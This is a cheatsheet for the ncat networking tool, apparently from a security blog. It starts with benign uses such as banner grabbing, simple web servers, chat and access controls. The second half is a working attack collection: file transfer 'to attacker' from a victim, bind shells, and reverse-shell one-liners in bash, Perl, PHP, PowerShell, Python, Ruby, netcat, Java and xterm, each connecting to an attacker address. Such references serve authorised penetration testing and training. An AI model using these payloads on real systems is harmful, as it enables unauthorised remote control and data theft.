Ncat Cheatsheet

Name
ncat — Concatenate and redirect sockets

Synopsis
ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]

Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Dec 2017 20:01:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://bitrot.sh/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

SSL Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 443 --ssl
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Dec 2017 20:01:59 GMT
Content-Type: text/html
Content-Length: 28379
Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT
Connection: close
ETag: "5a3930dd-6edb"
Accept-Ranges: bytes

<!DOCTYPE html>
<html lang="en">
...

Simple Web Server

echo '<html><body>This is ncat webserver</body></html>' > stuff.html
ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"

Once the ncat command is running navigate to web browser and point it to localhost.

Accept multiple requests

ncat --keep-open -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/stuff.html"

A Better HTTP Server

There’s a neat Lua script that takes advantage of ncat’s ability to interact with the language. The script can be found here. Try saving it to /tmp/httpd.lua

Navigate to a directory with .html files in it, and run the following command.

ncat -l -p 8080 --lua-exec /tmp/httpd.lua --keep-open

Unwrap SSL Connections

Server

Listen on port 6666 as a plain text server. Upon connection, connect to api.ipify.org:443 using SSL and forward client / server traffic. It also saves the full session to out.log for later analysis.

ncat -l -p 6666 -c 'ncat --ssl api.ipify.org 443' --keep-open -o out.log

Client

Grab our remote IP address by using an HTTP connection to localhost:6666, which handles the connection to api.ipify.org:443 using SSL.

curl 'http://localhost:6666?format=json' -H 'Host: api.ipify.org'

Connect two incoming connections

ncat -l -p 8080 -c 'ncat -l -p 9090'

Connect two listening servers

This can have some very interesting results.

ncat localhost 8080 -c 'ncat localhost 9090'

For more, check out our pivoting cheatsheet.

Telnet

ncat -t 192.168.1.1 23

Simple Chat

Server

ncat -l 1234 --chat

Client(s)

ncat localhost 1234

Copy Files with UDP

Server

ncat -l 6666 --udp

Client

ncat -udp localhost 6666 < stuff.py

Access Controls

Whitelist IPs

ncat -l -p 8080 --allow 192.168.1.1

Whitelist from file

Hosts should be separated by new lines

ncat -l -p 8080 --allowfile hosts

Blacklist IPs

ncat -l -p 8080 --deny 192.168.1.1,10.10.0.1

Blacklist IPs from file

Hosts should be separated by new lines

ncat -l -p 8080 --denyfile hosts

File Transfer with SSL

Reverse file transfer to attacker

Attacker

ncat -l -p 6666 --ssl > outputfile

Victim

ncat --ssl --send-only <attacker ip> 6666 < /bin/ncat

File send w/ Sender listening

Attacker

ncat -l -ssl -p 6666 --send-only < /bin/ncat

Victim

ncat localhost 6666 --ssl > outputfile

Bind Shell

Linux

ncat -l 6666 -e /bin/sh

Windows

ncat -l 6666 -e cmd

Reverse Shell

Victim

ncat <attacker ip address> 6666 -e /bin/sh

Attacker

ncat -l -p 6666

Victim machine doesn’t have ncat?

Bash

bash -i >& /dev/tcp/<attacker ip address>/6666 0>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

php -r '$sock=fsockopen("10.0.0.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

PowerShell

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("<attacker ip address"),<listening port>);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

Python 2.7 and 3

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip address>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

ProTip: This may become a lot easier on Windows and OSX hosts in the future if Microsoft adds Python as a language for Excel

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 6666

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

We need to modify /etc/X11/Xwrapper.config and change the allowed_users line to look like this. This file often gets overwritten on updates. After the file has been saved, restart the X11 login manager.

allowed_users=anybody

To catch the incoming xterm, start an X-Server (:1 — which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest -ac :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip

Bitcoin tip jar: bc1qgpl6lhf09j6kcdvkh8cz90p4cfxuyfec3ecjrd

Ethereum tip jar: 0x7e0Bf6D50b5F5fcbf76A16Bd5285CE0c74C063a9